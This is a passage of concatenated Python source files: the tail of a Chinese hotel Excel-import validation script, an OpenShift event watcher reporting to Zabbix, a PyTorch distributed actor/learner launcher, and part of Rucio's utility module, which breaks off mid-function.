'weekdayPrice': room_type_floor.get('weekdayPrice'),
'weekendPrice': room_type_floor.get('weekendPrice'),
'roomList': []
})
floor = room_type_floor.get('floor')
room_size = room_type_floor.get('size')
bed_count = room_type_floor.get('count')
bed_info_id = room_type_floor.get('bedInfoId')
print('房型: %s, 楼层: %s, 房间号: %s, 面积: %s, 床数: %s, 床型: %s'
% (room_type_id, floor, room_nums, room_size, bed_count, bed_info_id))
print('<br>')
if floor is None:
print('<p style="color:red">' + hotel_name + '第%s行楼层缺失</p>' % row_index)
if room_size is None:
print('<p style="color:red">' + hotel_name + '第%s行房间面积缺失</p>' % row_index)
if bed_count is None:
print('<p style="color:red">' + hotel_name + '第%s行床数缺失</p>' % row_index)
if bed_info_id is None:
print('<p style="color:red">' + hotel_name + '第%s行床型错误</p>' % row_index)
room_list = []
check = ',' not in room_nums
room_nums_arr = room_nums.split(',')
for room_i, room_no in enumerate(room_nums_arr):
if room_no is None or room_no == '':
continue
# strip leading/trailing whitespace
room_no = room_no.strip()
if room_no in room_num_check_list:
print('<p style="color:red">' + hotel_name + ',房间号%s已存在</p>' % room_no)
# length of 6 or more characters and no separator present
if len(room_no) >= 6 and check:
print('<p style="color:red">' + hotel_name + ',房间号%s格式不对</p>' % room_no)
room_num_check_list.append(room_no)
room_list.append({
'floor': floor,
'roomNo': room_no,
'size': room_size,
'status': 1,
'bedInfoList': [{
'count': bed_count,
'bedInfoId': bed_info_id
}]
})
if len(room_list) > 0:
ret_room_type.get('roomList').extend(room_list)
# ret_rooms[room_type_id] = ret_room_type
room_sum = room_sum + len(ret_room_type.get('roomList'))
return room_sum
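# Illustrative example (hypothetical cell value) of the separator normalization done in
# get_rooms() above:
#   '301、302，303.305'.replace('、', ',').replace('，', ',').replace('.', ',').split(',')
#   -> ['301', '302', '303', '305']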
excel_sheets = {
'酒店': 0,
'酒店(勿动)': 0,
'酒店(勿动)': 0,
'联系人': 1,
'联系人(勿动)': 1,
'联系人(勿动)': 1,
'OTA账号': 2,
'OTA账号(勿动)': 2,
'OTA账号(勿动)': 2,
'企业法人': 3,
'企业法人(勿动)': 3,
'企业法人(勿动)': 3,
'房间': 4,
'房型房间信息(编辑区)': 4,
'房型房间信息(编辑区)': 4,
'房型房间信息(填写区)': 4,
'酒店设施': 5,
'酒店设施(勿动)': 5,
'酒店设施(勿动)': 5
# '协议信息': 6,
# '协议信息(勿动)': 6
}
# read one Excel workbook
def read_xlsx(file_path, file_name):
ret_json_hotel = {
"type": "qianyu",
"operator": "qy_import"
}
wb = openpyxl.load_workbook(file_path, data_only=True)
for name, index in excel_sheets.items():
if name in wb.sheetnames:
sheet_index = excel_sheets.get(name)
sheet_data = get_sheet_data(wb.get_sheet_by_name(name), sheet_index)
if len(sheet_data) == 0:
continue
# 1. hotel info
if sheet_index == 0:
hotel_info = sheet_data[0] # read the hotel info
if str(hotel_info['stateId']) == '#REF!':
print('<p style="color:red">' + file_name + ',酒店 省 填写错误</p>')
if str(hotel_info['cityId']) == '#REF!':
print('<p style="color:red">' + file_name + ',酒店 市 填写错误</p>')
if str(hotel_info['clusterId']) == '#REF!':
print('<p style="color:red">' + file_name + ',酒店 区 填写错误</p>')
if str(hotel_info['streetId']) == '#REF!':
print('<p style="color:red">' + file_name + ',酒店 街道 填写错误</p>')
sign_room_num = hotel_info.get('signRoomNum')
# 2. contacts
if sheet_index == 1:
contacts = []
for index, contact in enumerate(sheet_data):
email = contact.get('email')
if email == '' or email == '0' or email == 0:
contact.pop('email')
if contact.get('name') is not None:
contacts.append(contact)
# 3. OTA accounts
if sheet_index == 2:
for index, ota_account in enumerate(sheet_data):
if ota_account.get('name') == '#N/A' or ota_account.get('password') == '#N/A':
print('<p style="color:red">' + file_name + ',OTA账号存在脏数据</p>')
# 4. corporate legal entity and bank info
if sheet_index == 3:
legal_bank_info = sheet_data[0]
# ret_json_hotel['legalEntities'] = [{
# 'name': legal_bank_info.get('name'),
# 'type': legal_bank_info.get('type'),
# 'termOfOperation': legal_bank_info.get('termOfOperation'),
# 'licenseNo': legal_bank_info.get('licenseNo'),
# 'certificateType': legal_bank_info.get('certificateType'),
# 'certificateNo': legal_bank_info.get('certificateNo')
# }]
if legal_bank_info.get('type') is None:
print('<p style="color:red">' + file_name + ',企业类型有误</p>')
if legal_bank_info.get('accountType') is None:
print('<p style="color:red">' + file_name + ',账号类型有误</p>')
# bank_interbank_number = legal_bank_info.get('bankInterbankNumber')
# if bank_interbank_number == '' or bank_interbank_number is None:
# bank_interbank_number = 'a'
#
# bank_ddress = legal_bank_info.get('bankAddress')
# if bank_ddress == '' or bank_ddress is None:
# bank_ddress = 'a'
#
# ret_json_hotel['bankAccountInfos'] = [{
# 'receivingParty': legal_bank_info.get('receivingParty'),
# 'contactTelephone': legal_bank_info.get('contactTelephone'),
# 'accountType': legal_bank_info.get('accountType'),
# 'bankAccount': legal_bank_info.get('bankAccount'),
# 'openingBank': legal_bank_info.get('openingBank'),
# 'branchOpeningBank': legal_bank_info.get('branchOpeningBank'),
# 'bankInterbankNumber': bank_interbank_number,
# 'bankAddress': bank_ddress
# }]
# 5. rooms
if sheet_index == 4:
# ret_json_hotel['room'] = get_rooms(sheet_data)
real_room_num = get_rooms(sheet_data, file_name)
if sign_room_num != real_room_num:
print('请检查房间数量,签约房间数为:%s,当前房间数为:%s' % (sign_room_num, real_room_num))
# 6. hotel facilities
if sheet_index == 5:
amenity_list = []
if sheet_data is not None and len(sheet_data) > 0:
for key, amenity_id in sheet_data[0].items():
if isinstance(amenity_id, int):
amenity_list.append(amenity_id)
ret_json_hotel['amenityList'] = amenity_list
return ret_json_hotel
# Walk the directory; use a process pool to cut down total runtime.
def list_dir(path):
now = datetime.datetime.now() # start timing
print('开始时间:' + now.strftime("%Y-%m-%d %H:%M:%S"))
print('<br>')
file_names = os.listdir(path)
file_names.sort()
# thread group
# thread = []
# process group
# process = []
process = Pool(20)
# res_data = []
for i in range(len(file_names)):
if not file_names[i].startswith('~$') and file_names[i].endswith('.xlsx'):
# print('<br>')
# print('<p>%s: %s</p>' % (i, file_names[i]))
# print('<br>')
file_name = path + "/" + file_names[i] # full path of the Excel file to read
# t = threading.Thread(target=read_xlsx, args=(file_name,))
# thread.append(t)
# p = Process(target=read_xlsx, args=(file_name,))
# process.append(p)
process.apply_async(read_xlsx, (file_name, file_names[i]))
# res_data.append(res_d)
# Multithreading does not help here: because of the GIL, Python runs only one thread at a time, so only one CPU would be used.
# thread_num = len(thread)
# print(thread_num)
# for i in range(len(thread)):
# thread[i].start()
#
# for i in range(len(thread)):
# thread[i].join()
# With plain multiprocessing, processes that all write to the same file would contend for the resource.
# process_num = len(process)
# for i in range(process_num):
# process[i].start()
#
# for i in range(process_num):
# process[i].join()
process.close()
process.join()
end = datetime.datetime.now() # stop timing
print('<br>')
print('结束时间:' + end.strftime("%Y-%m-%d %H:%M:%S"))
print('<br>')
print('程序耗时: ' + str(end - now))
list_dir(dir)
|
cron-event-watcher.py
|
#!/usr/bin/env python
# vim: expandtab:tabstop=4:shiftwidth=4
'''
Process OpenShift event stream
'''
#
# Copyright 2016 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#This is not a module, but pylint thinks it is. This is a command.
#pylint: disable=invalid-name
# pylint flags import errors, as the bot doesn't know about our openshift-tools libs
#pylint: disable=import-error
import argparse
from Queue import Queue
import re
import subprocess
import threading
import time
import yaml
from openshift_tools.monitoring.metric_sender import MetricSender
#pylint: disable=too-few-public-methods
class OpenshiftEventConsumer(object):
''' Submits events to Zabbix '''
def __init__(self, args, queue, zbx_keys):
self.queue = queue
self.args = args
self.zbx_keys = zbx_keys
def run(self):
''' main function '''
while True:
event_list = []
while not self.queue.empty():
event = self.queue.get()
if self.args.debug:
print "Processing event: {}".format(str(event))
event_list.append(event)
# initialize event counts so that we send '0' events
# in the case where no events were received
event_counts = {}
for zbx_key in self.zbx_keys:
event_counts[zbx_key] = 0
# add up each distinct event
for event in event_list:
event_counts[event] += 1
if self.args.verbose or self.args.dry_run:
print "Got events: " + str(event_counts)
if not self.args.dry_run:
metric_sender = MetricSender(verbose=self.args.verbose, debug=self.args.debug)
for event, count in event_counts.iteritems():
metric_sender.add_metric({event: count})
metric_sender.send_metrics()
time.sleep(self.args.reporting_period)
# Never should get here
class OpenshiftEventWatcher(object):
''' Watches OpenShift event stream '''
def __init__(self, queue):
self.args = None
self.queue = queue
self.parse_args()
def run(self):
''' Main function '''
self.event_watch_loop()
def watch_list_setup(self):
''' create dict of events/reasons to watch for
plus a regex to further filter events'''
with open(self.args.config, 'r') as config:
self.args.watch_for = yaml.load(config)['event_watcher_config']
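# The YAML config is expected to look roughly like the sketch below (reason names,
# patterns and Zabbix keys are illustrative assumptions, not shipped defaults):
#
#   event_watcher_config:
#     FailedScheduling:
#       - pattern: 'Insufficient cpu'
#         zbx_key: openshift.master.event.failedscheduling.cpu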
def parse_args(self):
''' parse the args from the cli '''
parser = argparse.ArgumentParser(description='OpenShift event watcher')
parser.add_argument('--kubeconfig', default='/etc/origin/master/admin.kubeconfig',
help='Location of OpenShift kubeconfig file')
parser.add_argument('--config', default='/container_setup/monitoring-config.yml',
help='Config file for event watcher script')
parser.add_argument('-v', '--verbose', action='store_true',
default=None, help='Verbose?')
parser.add_argument('--debug', action='store_true',
default=None, help='Debug?')
parser.add_argument('--dry-run', action='store_true', default=False,
help='Do not send results to Zabbix')
parser.add_argument('--reporting-period', default=60, type=int,
help='How many seconds between each reporting period')
self.args = parser.parse_args()
self.watch_list_setup()
def check_event(self, event):
''' If an event is something we're looking for
return the key it should be reported as '''
# Most events aren't something we will care about
# so catch that case and return early
foundReason = ''
for reasonCandidate in event['reasonFields']:
if reasonCandidate in self.args.watch_for.keys():
foundReason = reasonCandidate
if not foundReason:
return None
regex_list = self.args.watch_for[foundReason]
for regex in regex_list:
if re.search(regex['pattern'], event['message']):
return regex['zbx_key']
# If we made it here, then there was no regex match
# so the event is not something we will report to zabbix
return None
def get_zbx_keys(self):
''' return list of zbx keys config file says to report on '''
zbx_keys = []
for _, regex_list in self.args.watch_for.iteritems():
for regex in regex_list:
zbx_keys.append(regex['zbx_key'])
return zbx_keys
def event_watch_loop(self):
''' Loop to read/process OpenShift events '''
while True:
# k8s v1.11 has a bug preventing output of watches in non-default
# format types, so we can't use -o here.
popen = subprocess.Popen(['oc', 'get', 'events', '--all-namespaces',
'--config', self.args.kubeconfig,
'--watch-only'], bufsize=1,
stdout=subprocess.PIPE)
print "Watching for events: " + str(self.args.watch_for)
for line in iter(popen.stdout.readline, b''):
# The 'Reason' field should be the fourth element in
# the line, and the previous three elements do not contain
# values that allow whitespace - a split will suffice.
fields = line.split()
# We need to do a little checking to know where to
# find the 'message' column
if len(fields) > 8:
event = {
'reasonFields': fields[7:9],
'message': ' '.join(fields[8:])
}
if self.args.debug:
print "Event type candidates: " + ' '.join(event['reasonFields'])
print line
result = self.check_event(event)
if result:
if self.args.verbose:
print "Matched event: " + ' '.join(event['reasonFields']) + \
" " + event['message']
self.queue.put(result)
# Never should get here - but if it does, add a cool-off timer for a minute
# to avoid smashing repeated 'oc get events' calls.
time.sleep(self.args.reporting_period)
if __name__ == '__main__':
event_queue = Queue()
OEW = OpenshiftEventWatcher(event_queue)
zbx_key_list = OEW.get_zbx_keys()
watch_thread = threading.Thread(target=OEW.run)
watch_thread.start()
OEC = OpenshiftEventConsumer(OEW.args, event_queue, zbx_key_list)
event_consumer = threading.Thread(target=OEC.run)
event_consumer.start()
|
run.py
|
import torch.multiprocessing as mp
mp.set_start_method('spawn', force=True)
def run_actor(Actor, **kwargs):
actor = Actor(**kwargs)
actor.run()
def run_learner(Learner, **kwargs):
learner = Learner(**kwargs)
learner.run()
def run_distributed(create_env_fn, log_dir, Actor, Learner, num_actors,
configs):
mp.freeze_support()
shared_kwargs = {
'shared_memory': mp.Queue(100),
'shared_weights': mp.Manager().dict()
}
learner_kwargs = dict(
env=create_env_fn(),
log_dir=log_dir,
Learner=Learner,
**configs['common'],
**configs['learner'],
**shared_kwargs,
)
processes = [mp.Process(target=run_learner, kwargs=learner_kwargs)]
for actor_id in range(num_actors):
actor_kwargs = dict(
env=create_env_fn(),
log_dir=log_dir,
Actor=Actor,
actor_id=actor_id,
num_actors=num_actors,
**configs['common'],
**configs['actor'],
**shared_kwargs,
)
processes.append(
mp.Process(target=run_actor, kwargs=actor_kwargs))
for p in processes:
p.start()
for p in processes:
p.join()
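# A hypothetical invocation sketch; MyActor, MyLearner, make_env and the config keys are
# assumptions about the caller, not defined in this file:
#
#   configs = {'common': {...}, 'learner': {...}, 'actor': {...}}
#   run_distributed(create_env_fn=make_env, log_dir='./logs', Actor=MyActor,
#                   Learner=MyLearner, num_actors=4, configs=configs)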
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2022
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2022
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - martynia <janusz.martyniak@googlemail.com>, 2021-2022
# - jdierkes <joel.dierkes@cern.ch>, 2021
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - Rob Barnsley <robbarnsley@users.noreply.github.com>, 2021
# - Igor Mandrichenko <ivm@fnal.gov>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope": "scope", "name": "name"}
:returns: list of dictionaries {"scope": "scope", "name": "name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
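# Illustrative examples (hostname and parameters are hypothetical):
#   build_url('https://rucio.example.org', path='dids/list', params={'type': 'dataset'})
#   -> 'https://rucio.example.org/dids/list?type=dataset'
#   build_url('https://rucio.example.org', params={'name': ['a', 'b']}, doseq=True)
#   -> 'https://rucio.example.org?name=a&name=b'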
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns False otherwise. audience and scope must each be either a string
or a list; the same holds for the required_* variables.
If an unsupported combination of types is passed, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
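# Illustrative examples (scope and audience values are hypothetical):
#   all_oidc_req_claims_present('openid profile', 'rucio fts', 'profile', 'fts')
#   -> True
#   all_oidc_req_claims_present(['openid'], ['rucio'], 'profile', 'rucio')
#   -> False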
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
Sets the global PREFERRED_CHECKSUM if the given checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to set as preferred.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B
and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the
stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
can_mmap = False
try:
with open(file, 'r+b') as f:
can_mmap = True
except:
pass
try:
# use mmap if possible
if can_mmap:
with open(file, 'r+b') as f:
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
else:
with open(file, 'rb') as f:
# partial block reads at slightly increased buffer sizes
for block in iter(partial(f.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler-32 checksum of file %s: %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
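# A minimal, unoptimized reference of the Adler-32 recurrence described in the docstring
# above. Illustration only and not used by this module (adler32() delegates to zlib.adler32
# for speed); `data` is assumed to be a bytes object.
def _adler32_reference(data):
    mod = 65521
    a, b = 1, 0
    for byte in bytearray(data):
        a = (a + byte) % mod  # running sum of bytes, starting from 1
        b = (b + a) % mod     # running sum of the intermediate A values
    return '%08x' % ((b << 16) | a)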
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 64 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of up to 8 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at the domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(iterable, n):
"""
Yield successive n-sized chunks from the given iterable.
"""
if isinstance(iterable, list):
for i in range(0, len(iterable), n):
yield iterable[i:i + n]
else:
it = iter(iterable)
while True:
chunk = list(itertools.islice(it, n))
if not chunk:
return
yield chunk
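# Illustrative example (values are hypothetical):
#   list(chunks([1, 2, 3, 4, 5], 2))
#   -> [[1, 2], [3, 4], [5]]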
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
